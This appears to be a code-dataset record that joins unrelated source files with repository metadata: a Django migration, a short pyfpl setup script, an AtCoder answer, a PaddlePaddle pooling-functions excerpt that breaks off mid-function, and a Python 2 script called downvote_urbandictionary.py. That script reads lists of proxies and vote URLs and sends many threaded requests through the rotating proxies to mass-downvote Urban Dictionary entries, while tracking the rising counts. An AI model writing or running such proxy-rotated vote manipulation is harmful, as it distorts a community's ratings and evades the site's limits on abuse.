| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 386
|
py
|
# Generated by Django 3.1.3 on 2020-11-26 17:29
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('colleges', '0005_auto_20201126_2258'),
]
operations = [
migrations.AlterUniqueTogether(
name='colleges',
unique_together={('college_name', 'branch', 'subject', 'session')},
),
]
|
[
"nademnazir79@gmail.com"
] |
nademnazir79@gmail.com
|
ccd2b55fa52d1a6ae8d1e675060a901dac050266
|
5a7987a0741db037785bc297c699f2904dc4d556
|
/tests/run_setup.py
|
9ed530d55f390ee334e8828a892ff2361629749f
|
[] |
no_license
|
cjoyneruk/pyfpl
|
581778fbd1eeb3ea2cd28689d679dcd92e0e0071
|
e9c2e042b8ecf6bf37e3aeaddaccf98a493c7e59
|
refs/heads/master
| 2020-07-16T01:29:53.769187
| 2019-09-23T20:48:56
| 2019-09-23T20:48:56
| 205,691,839
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 32
|
py
|
from pyfpl import setup
setup()
|
[
"c.joyner@qmul.ac.uk"
] |
c.joyner@qmul.ac.uk
|
1d940d2cf808a4a5ee8f504ad054bf07686480c0
|
cfa474b083d308b0eff611163bce93919ec362c3
|
/downvote_urbandictionary.py
|
58ac4c7fc54db51fd067c111f2d90e688c1e5759
|
[] |
no_license
|
bubakazouba/urbandictionarydownvote
|
ad06715f7c451fa4af2d48e43d39d1229b1dc783
|
a929b6ca6aac612e56b4d12eef57f81b074e40e4
|
refs/heads/master
| 2021-01-23T16:04:54.336101
| 2017-06-04T00:44:29
| 2017-06-04T00:44:29
| 93,281,672
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,497
|
py
|
import requests, sys, threading, argparse, json
def read_list_from_file(fname):
with open(fname) as f:
content = f.readlines()
return [x.strip() for x in content]
def downvote_url_with_list(url, proxy_list, len_of_all_proxy_list, thread_number):
global proxies_failed, proxies_succeeded, now_down, first_down
for proxy in proxy_list:
proxies_failed += 1
proxies = {'http': proxy}
try:
a = json.loads(requests.get(url,proxies=proxies,timeout=5).text)
try:
proxies_succeeded += 1 if a["status"] == "saved" else 0
now_down = a["down"]
if first_down == None: first_down = now_down
except Exception as e: pass
except Exception as e: pass
if None not in [first_down, now_down]:
print '%d: %d/%d/%d. Down: %d-->%d' % (thread_number, proxies_succeeded, proxies_failed, len_of_all_proxy_list, first_down, now_down)
sys.stdout.flush()
parser = argparse.ArgumentParser(description='Test proxies')
parser.add_argument('-f', '--proxylist-filename', dest='proxy_fname', action='store', help='file containing proxy list')
parser.add_argument('-x', '--urls-filename', dest='urls_fname', action='store', help='file containing urls')
parser.add_argument('-N', '--number-of-threads', dest='N', action='store', help='number of threads')
args = parser.parse_args()
urls_fname = args.urls_fname
proxy_fname = args.proxy_fname
N = int(args.N)
if None in [urls_fname,proxy_fname]:
print 'you have to enter proxy filename (-f) and urls filename (-x) and number of threads (-N)'
exit()
proxy_list = read_list_from_file(proxy_fname)
urls_list = read_list_from_file(urls_fname)
L = len(proxy_list)
print urls_list
for url in urls_list:
proxies_failed = proxies_succeeded = 0
first_down = now_down = None
print url
print 'success-failure/total. Down: started_with-->now_at'
i = 0
thread_number = 0
threads = []
while i <= L:
sub_proxy_list = proxy_list[i:i+L/N]
i += L/N
thread_number += 1
threads.append(threading.Thread(target=downvote_url_with_list, args=[url, sub_proxy_list, L, thread_number]))
threads[-1].start()
print 'going to join nowwww'
for thread in threads:
print 'trying to join...'
thread.join()
print 'joined!!!!!!!!!!'
print '--------------- done with url: '+url
# join all threads before going to next url
|
[
"ahsahmoud@ucdavis.edu"
] |
ahsahmoud@ucdavis.edu
|
b83d7540a601a21c01a3242898b9d7a2394f6490
|
209a375fb65d38464fc67281643615a7a4f2012b
|
/abc159/c.py
|
f7e8cb5b361f8e772f1ab2bf2d5eebee81055fc9
|
[] |
no_license
|
satoshun-algorithm-example/atcoder
|
707804c855768496676dc4711586d517945646d3
|
81e898f38d1e2db3200882dc34180c407a86de12
|
refs/heads/master
| 2021-06-21T23:18:32.532374
| 2020-11-23T09:05:19
| 2020-11-23T09:05:19
| 154,495,507
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 97
|
py
|
# https://atcoder.jp/contests/abc159/tasks/abc159_c
L = int(input())
a = L / 3
print(a * a * a)
|
[
"shun.sato1@gmail.com"
] |
shun.sato1@gmail.com
|
465197ced44448fbd1f5072861ff9b7c86cf9093
|
43e0cfda9c2ac5be1123f50723a79da1dd56195f
|
/python/paddle/nn/functional/pooling.py
|
766a1ca3aaf64024c179f8a5d38a263e550f5c5a
|
[
"Apache-2.0"
] |
permissive
|
jiangjiajun/Paddle
|
837f5a36e868a3c21006f5f7bb824055edae671f
|
9b35f03572867bbca056da93698f36035106c1f3
|
refs/heads/develop
| 2022-08-23T11:12:04.503753
| 2022-08-11T14:40:07
| 2022-08-11T14:40:07
| 426,936,577
| 0
| 0
|
Apache-2.0
| 2022-02-17T03:43:19
| 2021-11-11T09:09:28
|
Python
|
UTF-8
|
Python
| false
| false
| 84,464
|
py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# TODO: define pooling functions
from ...fluid.layers import utils, LayerHelper
from ...tensor.manipulation import unsqueeze, squeeze
from ...fluid.data_feeder import check_type, check_variable_and_dtype
from paddle import _C_ops
from paddle import in_dynamic_mode
from paddle.fluid.framework import _in_legacy_dygraph
from paddle.fluid.framework import in_dygraph_mode
__all__ = []
def _is_list_or_tuple(input):
return isinstance(input, (list, tuple))
def _check_input(x, dimension):
if len(x.shape) != dimension:
raise ValueError(
"Excepted Input X is {}-D tensor, but received {}-D {}".format(
dimension, len(x.shape), type(x)))
def _check_instance(x, x_name, types=(int, float)):
if not isinstance(x, types):
raise ValueError(
"Excepted {} type for {} but received type: {}. ".format(
types, x_name, type(x)))
def _check_value_limitation(x, x_name, min_limit=1e-3):
def _check_value(x, x_name, min_limit=1e-3):
if isinstance(x, int) and min_limit is not None and x < min_limit:
raise ValueError(
"Excepted the input {} to be greater than {} but received x: {}. "
.format(x_name, min_limit, x))
for ele in x:
_check_value(ele, x_name)
def _zero_padding_in_batch_and_channel(padding, channel_last):
if channel_last:
return list(padding[0]) == [0, 0] and list(padding[-1]) == [0, 0]
else:
return list(padding[0]) == [0, 0] and list(padding[1]) == [0, 0]
def _exclude_padding_in_batch_and_channel(padding, channel_last):
padding_ = padding[1:-1] if channel_last else padding[2:]
padding_ = [elem for pad_a_dim in padding_ for elem in pad_a_dim]
return padding_
def _channel_last(data_format, num_dims):
if num_dims == 1:
if data_format not in ['NCL', 'NLC']:
raise ValueError(
"Attr(data_format) should be 'NCL' or 'NLC'. Received "
"Attr(data_format): %s" % str(data_format))
else:
return True if data_format == "NLC" else False
if num_dims == 2:
if data_format not in ['NCHW', 'NHWC']:
raise ValueError(
"Attr(data_format) should be 'NCHW' or 'NHWC'. Received "
"Attr(data_format): %s" % str(data_format))
else:
return True if data_format == "NHWC" else False
if num_dims == 3:
if data_format not in ['NCDHW', 'NDHWC']:
raise ValueError(
"Attr(data_format) should be 'NCDHW' or 'NDHWC'. Received "
"Attr(data_format): %s" % str(data_format))
else:
return True if data_format == "NDHWC" else False
def _update_padding_nd(padding, num_dims, channel_last=False, ceil_mode=False):
if isinstance(padding, str):
padding = padding.upper()
if padding not in ["SAME", "VALID"]:
raise ValueError(
"Unknown padding: '{}'. It can only be 'SAME' or 'VALID'.".
format(padding))
if padding == "VALID":
if ceil_mode != False:
raise ValueError(
"When Attr(padding) is \"VALID\", Attr(ceil_mode) must be False. "
"Received ceil_mode: True.")
padding_algorithm = "VALID"
padding = [0] * num_dims
else:
padding_algorithm = "SAME"
padding = [0] * num_dims
elif _is_list_or_tuple(padding):
# for padding like
# [(pad_before, pad_after), (pad_before, pad_after), ...]
# padding for batch_dim and channel_dim included
if len(padding) == 2 + num_dims and _is_list_or_tuple(padding[0]):
if not _zero_padding_in_batch_and_channel(padding, channel_last):
raise ValueError(
"Non-zero padding({}) in the batch or channel dimensions "
"is not supported.".format(padding))
padding_algorithm = "EXPLICIT"
padding = _exclude_padding_in_batch_and_channel(
padding, channel_last)
if utils._is_symmetric_padding(padding, num_dims):
padding = padding[0::2]
# for padding like [pad_before, pad_after, pad_before, pad_after, ...]
elif len(padding) == 2 * num_dims and isinstance(padding[0], int):
padding_algorithm = "EXPLICIT"
padding = utils.convert_to_list(padding, 2 * num_dims, 'padding')
if utils._is_symmetric_padding(padding, num_dims):
padding = padding[0::2]
# for padding like [pad_d1, pad_d2, ...]
elif len(padding) == num_dims and isinstance(padding[0], int):
padding_algorithm = "EXPLICIT"
padding = utils.convert_to_list(padding, num_dims, 'padding')
else:
raise ValueError("Invalid padding: {}".format(padding))
# for integer padding
else:
padding_algorithm = "EXPLICIT"
padding = utils.convert_to_list(padding, num_dims, 'padding')
return padding, padding_algorithm
def _expand_low_nd_padding(padding):
#1d to 2d fake input
if len(padding) == 2:
padding = [0] * 2 + padding
elif len(padding) == 1:
padding = [0] + padding
else:
raise ValueError(
"The size of padding's dimmention should be 1 or 2. But got padding={}"
.format(padding))
return padding
def avg_pool1d(x,
kernel_size,
stride=None,
padding=0,
exclusive=True,
ceil_mode=False,
name=None):
"""
This API implements average pooling 1d operation,
See more details in :ref:`api_nn_pooling_AvgPool1d` .
Args:
x (Tensor): The input tensor of pooling operator which is a 3-D tensor with
shape [N, C, L]. where `N` is batch size, `C` is the number of channels,
`L` is the length of the feature. The data type is float32 or float64.
kernel_size (int|list|tuple): The pool kernel size. If pool kernel size is a tuple or list,
it must contain an integer.
stride (int|list|tuple): The pool stride size. If pool stride size is a tuple or list,
it must contain an integer.
padding (string|int|list|tuple): The padding size. Padding could be in one of the following forms.
1. A string in ['valid', 'same'].
2. An int, which means the feature map is zero padded by size of `padding` on every sides.
3. A list[int] or tuple(int) whose length is 1, which means the feature map is zero padded by the size of `padding[0]` on every sides.
4. A list[int] or tuple(int) whose length is 2. It has the form [pad_before, pad_after].
5. A list or tuple of pairs of integers. It has the form [[pad_before, pad_after], [pad_before, pad_after], ...]. Note that, the batch dimension and channel dimension should be [0,0] or (0,0).
The default value is 0.
exclusive (bool): Whether to exclude padding points in average pooling
mode, default is `True`.
ceil_mode (bool): ${ceil_mode_comment}Whether to use the ceil function to calculate output height and width.
If it is set to False, the floor function will be used. The default value is False.
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Tensor: The output tensor of pooling result. The data type is same as input tensor.
Raises:
ValueError: If `padding` is a string, but not "SAME" or "VALID".
ValueError: If `padding` is "VALID", but `ceil_mode` is True.
ValueError: If `padding` is a list or tuple but its length is greater than 1.
ShapeError: If the input is not a 3-D tensor.
ShapeError: If the output's shape calculated is not greater than 0.
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
import numpy as np
data = paddle.to_tensor(np.random.uniform(-1, 1, [1, 3, 32]).astype(np.float32))
out = F.avg_pool1d(data, kernel_size=2, stride=2, padding=0)
# out shape: [1, 3, 16]
"""
"""NCL to NCHW"""
data_format = "NCHW"
if not in_dynamic_mode():
check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'avg_pool1d')
_check_input(x, 3)
x = unsqueeze(x, [2])
kernel_size = utils.convert_to_list(kernel_size, 1, 'kernel_size')
kernel_size = [1] + kernel_size
if stride is None:
stride = kernel_size
else:
stride = utils.convert_to_list(stride, 1, 'pool_stride')
stride = [1] + stride
_check_value_limitation(kernel_size, "kernel_size", min_limit=1e-3)
_check_value_limitation(stride, "stride", min_limit=1e-3)
channel_last = _channel_last("NCL", 1)
padding, padding_algorithm = _update_padding_nd(padding,
1,
channel_last=channel_last,
ceil_mode=ceil_mode)
# use 2d to implenment 1d should expand padding in advance.
padding = _expand_low_nd_padding(padding)
if in_dynamic_mode():
output = _C_ops.pool2d(x, 'pooling_type', 'avg', 'ksize', kernel_size,
'global_pooling', False, 'strides', stride,
'paddings', padding, 'padding_algorithm',
padding_algorithm, 'use_cudnn', True,
'ceil_mode', ceil_mode, 'use_mkldnn', False,
'exclusive', exclusive, 'data_format',
data_format)
return squeeze(output, [2])
op_type = 'pool2d'
helper = LayerHelper(op_type, **locals())
dtype = helper.input_dtype(input_param_name='x')
pool_out = helper.create_variable_for_type_inference(dtype)
helper.append_op(type=op_type,
inputs={"X": x},
outputs={"Out": pool_out},
attrs={
"pooling_type": 'avg',
"ksize": kernel_size,
"global_pooling": False,
"strides": stride,
"paddings": padding,
"padding_algorithm": padding_algorithm,
"use_cudnn": True,
"ceil_mode": ceil_mode,
"use_mkldnn": False,
"exclusive": exclusive,
"data_format": data_format,
})
return squeeze(pool_out, [2])
def avg_pool2d(x,
kernel_size,
stride=None,
padding=0,
ceil_mode=False,
exclusive=True,
divisor_override=None,
data_format="NCHW",
name=None):
"""
This API implements average pooling 2d operation.
See more details in :ref:`api_nn_pooling_AvgPool2d` .
Args:
x (Tensor): The input tensor of pooling operator which is a 4-D tensor with
shape [N, C, H, W]. The format of input tensor is `"NCHW"` or
`"NHWC"`, where `N` is batch size, `C` is the number of channels,
`H` is the height of the feature, and `W` is the width of the
feature. The data type if float32 or float64.
kernel_size (int|list|tuple): The pool kernel size. If it is a tuple or list,
it must contain two integers, (kernel_size_Height, kernel_size_Width).
Otherwise, the pool kernel size will be a square of an int.
stride (int|list|tuple): The stride size. If it is a tuple or list,
it must contain two integers, (stride_Height, stride_Width).
Otherwise, the stride size will be a square of an int.
padding (string|int|list|tuple): The padding size. Padding could be in one of the following forms.
1. A string in ['valid', 'same'].
2. An int, which means the feature map is zero padded by size of `padding` on every sides.
3. A list[int] or tuple(int) whose length is 2, [pad_height, pad_weight] whose value means the padding size of each dimension.
4. A list[int] or tuple(int) whose length is 4. [pad_height_top, pad_height_bottom, pad_width_left, pad_width_right] whose value means the padding size of each side.
5. A list or tuple of pairs of integers. It has the form [[pad_before, pad_after], [pad_before, pad_after], ...]. Note that, the batch dimension and channel dimension should be [0,0] or (0,0).
The default value is 0.
ceil_mode (bool): when True, will use `ceil` instead of `floor` to compute the output shape
exclusive (bool): Whether to exclude padding points in average pooling
mode, default is `true`.
divisor_override (float): if specified, it will be used as divisor, otherwise kernel_size will be used. Default None.
data_format (string): The data format of the input and output data. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`.
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Tensor: The output tensor of pooling result. The data type is same as input tensor.
Raises:
ValueError: If `padding` is a string, but not "SAME" or "VALID".
ValueError: If `padding` is "VALID", but `ceil_mode` is True.
ShapeError: If the output's shape calculated is not greater than 0.
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
import numpy as np
# avg pool2d
x = paddle.to_tensor(np.random.uniform(-1, 1, [1, 3, 32, 32]).astype(np.float32))
out = F.avg_pool2d(x,
kernel_size=2,
stride=2, padding=0)
# out.shape [1, 3, 16, 16]
"""
kernel_size = utils.convert_to_list(kernel_size, 2, 'pool_size')
if stride is None:
stride = kernel_size
else:
stride = utils.convert_to_list(stride, 2, 'pool_stride')
_check_value_limitation(kernel_size, "kernel_size", min_limit=1e-3)
_check_value_limitation(stride, "stride", min_limit=1e-3)
channel_last = _channel_last(data_format, 2)
padding, padding_algorithm = _update_padding_nd(padding,
2,
channel_last,
ceil_mode=ceil_mode)
if in_dygraph_mode() or _in_legacy_dygraph():
if in_dygraph_mode():
output = _C_ops.final_state_pool2d(x, kernel_size, stride, padding,
ceil_mode, exclusive,
data_format, 'avg', False, False,
padding_algorithm)
else:
output = _C_ops.pool2d(x, 'pooling_type', 'avg', 'ksize',
kernel_size, 'global_pooling', False,
'padding_algorithm', padding_algorithm,
'strides', stride, 'paddings', padding,
'use_cudnn', True, 'ceil_mode', ceil_mode,
'use_mkldnn', False, 'exclusive', exclusive,
'data_format', data_format)
if divisor_override is None:
return output
else:
_check_instance(divisor_override, "divisor_override")
return output * (kernel_size[0] * kernel_size[1]) / divisor_override
op_type = 'pool2d'
helper = LayerHelper(op_type, **locals())
check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'avg_pool2d')
dtype = helper.input_dtype(input_param_name='x')
pool_out = helper.create_variable_for_type_inference(dtype)
helper.append_op(type=op_type,
inputs={"X": x},
outputs={"Out": pool_out},
attrs={
"pooling_type": "avg",
"ksize": kernel_size,
"global_pooling": False,
"strides": stride,
"paddings": padding,
"padding_algorithm": padding_algorithm,
"use_cudnn": True,
"ceil_mode": ceil_mode,
"use_mkldnn": False,
"exclusive": exclusive,
"data_format": data_format,
})
if divisor_override is None:
return pool_out
else:
_check_instance(divisor_override, "divisor_override")
return pool_out * (kernel_size[0] * kernel_size[1]) / divisor_override
def avg_pool3d(x,
kernel_size,
stride=None,
padding=0,
ceil_mode=False,
exclusive=True,
divisor_override=None,
data_format="NCDHW",
name=None):
"""
This API implements average pooling 3d operation.
See more details in :ref:`api_nn_pooling_AvgPool3d` .
Args:
x (Tensor): The input tensor of pooling operator, which is a 5-D tensor with
shape [N, C, D, H, W], where `N` represents the batch size, `C` represents
the number of channels, `D`, `H` and `W` represent the depth, height and width of the feature respectively.
kernel_size (int|list|tuple): The pool kernel size. If pool kernel size
is a tuple or list, it must contain three integers,
(kernel_size_Depth, kernel_size_Height, kernel_size_Width).
Otherwise, the pool kernel size will be the cube of an int.
stride (int|list|tuple): The pool stride size. If pool stride size is a tuple or list,
it must contain three integers, [stride_Depth, stride_Height, stride_Width).
Otherwise, the pool stride size will be a cube of an int.
padding (string|int|list|tuple): The padding size. Padding could be in one of the following forms.
1. A string in ['valid', 'same'].
2. An int, which means the feature map is zero padded by size of `padding` on every sides.
3. A list[int] or tuple(int) whose length is 3, [pad_depth, pad_height, pad_weight] whose value means the padding size of each dimension.
4. A list[int] or tuple(int) whose length is 6. [pad_depth_front, pad_depth_back, pad_height_top, pad_height_bottom, pad_width_left, pad_width_right] whose value means the padding size of each side.
5. A list or tuple of pairs of integers. It has the form [[pad_before, pad_after], [pad_before, pad_after], ...]. Note that, the batch dimension and channel dimension should be [0,0] or (0,0).
The default value is 0.
ceil_mode (bool): ${ceil_mode_comment}
exclusive (bool): Whether to exclude padding points in average pooling
mode, default is True.
divisor_override (int|float) if specified, it will be used as divisor, otherwise kernel_size will be used. Default None.
data_format (string): The data format of the input and output data. An optional string from: `"NCDHW"`, `"NDHWC"`.
The default is `"NCDHW"`. When it is `"NCDHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_depth, input_height, input_width]`.
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Tensor: The output tensor of pooling result. The data type is same as input tensor.
Raises:
ValueError: If `padding` is a string, but not "SAME" or "VALID".
ValueError: If `padding` is "VALID", but `ceil_mode` is True.
ShapeError: If the output's shape calculated is not greater than 0.
Examples:
.. code-block:: python
import paddle
import numpy as np
x = paddle.to_tensor(np.random.uniform(-1, 1, [1, 3, 32, 32, 32]).astype(np.float32))
# avg pool3d
out = paddle.nn.functional.avg_pool3d(
x,
kernel_size = 2,
stride = 2,
padding=0)
# out.shape: [1, 3, 16, 16, 16]
"""
kernel_size = utils.convert_to_list(kernel_size, 3, 'pool_size')
if stride is None:
stride = kernel_size
else:
stride = utils.convert_to_list(stride, 3, 'pool_stride')
channel_last = _channel_last(data_format, 3)
padding, padding_algorithm = _update_padding_nd(padding,
3,
channel_last=channel_last,
ceil_mode=ceil_mode)
_check_value_limitation(kernel_size, "kernel_size", min_limit=1e-3)
_check_value_limitation(stride, "stride", min_limit=1e-3)
if in_dygraph_mode() or _in_legacy_dygraph():
if in_dygraph_mode():
output = _C_ops.final_state_pool3d(x, kernel_size, stride, padding,
ceil_mode, exclusive,
data_format, 'avg', False, False,
padding_algorithm)
if _in_legacy_dygraph():
output = _C_ops.pool3d(x, 'pooling_type', 'avg', 'ksize',
kernel_size, 'strides', stride, 'paddings',
padding, 'global_pooling', False,
'padding_algorithm', padding_algorithm,
'use_cudnn', True, 'ceil_mode', ceil_mode,
'use_mkldnn', False, 'exclusive', exclusive,
'data_format', data_format)
if divisor_override is None:
return output
else:
_check_instance(divisor_override, "divisor_override")
return output * (kernel_size[0] * kernel_size[1] *
kernel_size[2]) / divisor_override
op_type = "pool3d"
helper = LayerHelper(op_type, **locals())
check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'max_pool3d')
dtype = helper.input_dtype(input_param_name='x')
pool_out = helper.create_variable_for_type_inference(dtype)
outputs = {"Out": pool_out}
helper.append_op(type=op_type,
inputs={"X": x},
outputs=outputs,
attrs={
"pooling_type": 'avg',
"ksize": kernel_size,
"global_pooling": False,
"strides": stride,
"paddings": padding,
"padding_algorithm": padding_algorithm,
"use_cudnn": True,
"ceil_mode": ceil_mode,
"use_mkldnn": False,
"exclusive": exclusive,
"data_format": data_format,
})
if divisor_override is None:
return pool_out
else:
_check_instance(divisor_override, "divisor_override")
return pool_out * (kernel_size[0] * kernel_size[1] *
kernel_size[2]) / divisor_override
def max_pool1d(x,
kernel_size,
stride=None,
padding=0,
return_mask=False,
ceil_mode=False,
name=None):
"""
This API implements max pooling 1d opereation.
See more details in :ref:`api_nn_pooling_MaxPool1d` .
Args:
x (Tensor): The input tensor of pooling operator which is a 3-D tensor with
shape [N, C, L], where `N` is batch size, `C` is the number of channels,
`L` is the length of the feature. The data type if float32 or float64.
kernel_size (int|list|tuple): The pool kernel size. If pool kernel size is a tuple or list,
it must contain an integer.
stride (int|list|tuple): The pool stride size. If pool stride size is a tuple or list,
it must contain an integer.
padding (string|int|list|tuple): The padding size. Padding could be in one of the following forms.
1. A string in ['valid', 'same'].
2. An integer, which means the feature map is zero padded by size of `padding` on every sides.
3. A list[int] or tuple(int) whose length is 1, which means the feature map is zero padded by the size of `padding[0]` on every sides.
4. A list[int] or tuple(int) whose length is 2. It has the form [pad_before, pad_after].
5. A list or tuple of pairs of integers. It has the form [[pad_before, pad_after], [pad_before, pad_after], ...]. Note that, the batch dimension and channel dimension should be [0,0] or (0,0).
The default value is 0.
return_mask (bool): Whether return the max indices along with the outputs. default is `False`.
ceil_mode (bool): Whether to use the ceil function to calculate output height and width. False is the default.
If it is set to False, the floor function will be used. Default False.
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Tensor: The output tensor of pooling result. The data type is same as input tensor.
Raises:
ValueError: If `padding` is a string, but not "SAME" or "VALID".
ValueError: If `padding` is "VALID", but `ceil_mode` is True.
ShapeError: If the input is not a 3-D tensor.
ShapeError: If the output's shape calculated is not greater than 0.
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
import numpy as np
data = paddle.to_tensor(np.random.uniform(-1, 1, [1, 3, 32]).astype(np.float32))
pool_out = F.max_pool1d(data, kernel_size=2, stride=2, padding=0)
# pool_out shape: [1, 3, 16]
pool_out, indices = F.max_pool1d(data, kernel_size=2, stride=2, padding=0, return_mask=True)
# pool_out shape: [1, 3, 16], indices shape: [1, 3, 16]
"""
"""NCL to NCHW"""
data_format = "NCHW"
if not in_dynamic_mode():
check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'max_pool1d')
_check_input(x, 3)
x = unsqueeze(x, [2])
kernel_size = [1] + utils.convert_to_list(kernel_size, 1, 'pool_size')
if stride is None:
stride = kernel_size
else:
stride = [1] + utils.convert_to_list(stride, 1, 'pool_stride')
padding, padding_algorithm = _update_padding_nd(padding,
1,
ceil_mode=ceil_mode)
# use 2d to implenment 1d should expand padding in advance.
padding = _expand_low_nd_padding(padding)
if in_dygraph_mode():
if return_mask:
pool_out = _C_ops.final_state_max_pool2d_with_index(
x, kernel_size, stride, padding, False, False)
return (squeeze(pool_out[0], [2]),
squeeze(pool_out[1], [2])) if return_mask else squeeze(
pool_out[0], [2])
else:
pool_out = _C_ops.final_state_pool2d(x, kernel_size, stride,
padding, ceil_mode, True,
data_format, 'max', False,
False, padding_algorithm)
return squeeze(pool_out, [2])
if _in_legacy_dygraph():
if return_mask:
pool_out = _C_ops.max_pool2d_with_index(
x, 'ksize', kernel_size, 'global_pooling', False, 'strides',
stride, 'paddings', padding, 'padding_algorithm',
padding_algorithm, 'use_cudnn', True, 'ceil_mode', ceil_mode,
'use_mkldnn', False, 'exclusive', True, 'data_format',
data_format)
return (squeeze(pool_out[0], [2]),
squeeze(pool_out[1], [2])) if return_mask else squeeze(
pool_out[0], [2])
else:
pool_out = _C_ops.pool2d(x, 'pooling_type', 'max', 'ksize',
kernel_size, 'global_pooling', False,
'padding_algorithm', padding_algorithm,
'strides', stride, 'paddings', padding,
'use_cudnn', True, 'ceil_mode', ceil_mode,
'use_mkldnn', False, 'exclusive', True,
'data_format', data_format)
return squeeze(pool_out, [2])
op_type = 'max_pool2d_with_index' if return_mask else "pool2d"
helper = LayerHelper(op_type, **locals())
dtype = helper.input_dtype(input_param_name='x')
pool_out = helper.create_variable_for_type_inference(dtype)
mask = helper.create_variable_for_type_inference('int32')
outputs = {"Out": pool_out, "Mask": mask}
helper.append_op(type=op_type,
inputs={"X": x},
outputs=outputs,
attrs={
"pooling_type": 'max',
"ksize": kernel_size,
"global_pooling": False,
"strides": stride,
"paddings": padding,
"padding_algorithm": padding_algorithm,
"use_cudnn": True,
"ceil_mode": ceil_mode,
"use_mkldnn": False,
"exclusive": True,
"data_format": data_format,
})
return (squeeze(pool_out, [2]),
squeeze(mask, [2])) if return_mask else squeeze(pool_out, [2])
def _unpool_output_size(x, kernel_size, stride, padding, output_size):
input_size = x.shape
default_size = []
for d in range(len(kernel_size)):
default_size.append((input_size[-len(kernel_size) + d] - 1) *
stride[d] + kernel_size[d] - 2 * padding[d])
if output_size is None:
ret = default_size
else:
if len(output_size) == len(kernel_size) + 2:
output_size = output_size[2:]
if len(output_size) != len(kernel_size):
raise ValueError(
"output_size should be a sequence containing "
"{} or {} elements, but it has a length of '{}'".format(
len(kernel_size),
len(kernel_size) + 2, len(output_size)))
for d in range(len(kernel_size)):
min_size = default_size[d] - stride[d]
max_size = default_size[d] + stride[d]
if not (min_size < output_size[d] < max_size):
raise ValueError(
'invalid output_size "{}" (dim {} must be between {} and {})'
.format(output_size, d, min_size, max_size))
ret = output_size
return ret
def max_unpool1d(x,
indices,
kernel_size,
stride=None,
padding=0,
data_format="NCL",
output_size=None,
name=None):
r"""
This API implements max unpooling 1d opereation.
`max_unpool1d` accepts the output of `max_pool1d` as input,
including the indices of the maximum value and calculate the partial inverse.
All non-maximum values are set to zero.
- Input: :math:`(N, C, L_{in})`
- Output: :math:`(N, C, L_{out})`, where
.. math::
L_{out} = (L_{in} - 1) * stride - 2 * padding + kernel\_size
or as given by :attr:`output_size` in the call operator.
Args:
x (Tensor): The input tensor of unpooling operator which is a 3-D tensor with
shape [N, C, L]. The format of input tensor is `"NCL"`,
where `N` is batch size, `C` is the number of channels, `L` is
the length of the feature. The data type is float32 or float64.
indices (Tensor): The indices given out by maxpooling1d which is a 3-D tensor with
shape [N, C, L]. The format of input tensor is `"NCL"` ,
where `N` is batch size, `C` is the number of channels, `L` is
the length of the featuree. The data type is float32 or float64.
kernel_size (int|list|tuple): The unpool kernel size. If unpool kernel size is a tuple or list,
it must contain an integer.
stride (int|list|tuple): The unpool stride size. If unpool stride size is a tuple or list,
it must contain an integer.
padding (int | tuple): Padding that was added to the input.
output_size(list|tuple, optional): The target output size. If output_size is not specified,
the actual output shape will be automatically calculated by (input_shape,
kernel_size, stride, padding).
data_format (string): The data format of the input and output data.
The default is `"NCL"`. When it is `"NCL"`, the data is stored in the order of:
`[batch_size, input_channels, input_length]`.
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Tensor: The output tensor of unpooling result.
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
data = paddle.rand(shape=[1, 3, 16])
pool_out, indices = F.max_pool1d(data, kernel_size=2, stride=2, padding=0, return_mask=True)
# pool_out shape: [1, 3, 8], indices shape: [1, 3, 8]
unpool_out = F.max_unpool1d(pool_out, indices, kernel_size=2, padding=0)
# unpool_out shape: [1, 3, 16]
"""
"""NCL to NCHW"""
if data_format not in ["NCL"]:
raise ValueError("Attr(data_format) should be 'NCL'. Received "
"Attr(data_format): %s." % str(data_format))
data_format = "NCHW"
x = unsqueeze(x, [2])
indices = unsqueeze(indices, [2])
kernel_size = [1] + utils.convert_to_list(kernel_size, 1, 'pool_size')
if stride is None:
stride = kernel_size
else:
stride = [1] + utils.convert_to_list(stride, 1, 'pool_stride')
padding, padding_algorithm = _update_padding_nd(padding, 1)
# use 2d to implenment 1d should expand padding in advance.
padding = _expand_low_nd_padding(padding)
output_size = _unpool_output_size(x, kernel_size, stride, padding,
output_size)
if in_dygraph_mode():
output = _C_ops.final_state_unpool(x, indices, kernel_size, stride,
padding, output_size, data_format)
return squeeze(output, [2])
elif in_dynamic_mode():
output = _C_ops.unpool(x, indices, 'unpooling_type', 'max', 'ksize',
kernel_size, 'strides', stride, 'paddings',
padding, "output_size", output_size,
"data_format", data_format)
return squeeze(output, [2])
op_type = "unpool"
helper = LayerHelper(op_type, **locals())
dtype = helper.input_dtype(input_param_name="x")
